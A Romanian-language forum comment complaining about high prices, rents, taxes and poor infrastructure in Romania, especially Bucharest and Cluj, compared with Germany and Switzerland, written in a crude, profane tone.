  36. Unde ai fost pe afara si cat? Aveti preturi mult mai mari decat in Germania sau Elvetia. In special in catunul de Bucuresti sau in Cluj. Oricum, toti vorbiti de bani. - De liniste nu spune nimeni ceva - De asigurare sociala sau de sanatate nu spune nimeni - De infrastructura la fel. Nu aveti strazi, nu aveti autostrazi, e totul facut in batjocura - De taxele extrem de mari nu spune nimeni nimic (nu alea din statistici, cele reale) - De preturile exorbitante nu mai spune nimeni nimic. Inclusiv alimentele sunt mult mai scumpe decat in tarile din vest. Chiriile au preturi ca in Germania si conditii de romania. In special in saracia aia de bucuresti (cel mai jegos oras vazut vreodata in europa). Ca sa nu spun de Cluj. Preturi de Geneva si conditii de inchisori rusesti. Continuati sa visati ca romania o sa ajunga vreodata o tara civilizata. Te futi in ea de tara si in parastasul ei. Voi va rezumati la IT. Rezumati-va la cineva care serveste la o terasa, care e paznic, care e vanzator. Adica din ce e formata marea pulime, nu faceti statistici pe elite si grupuri privilegiate.
    2 points
×
×
  • Create New...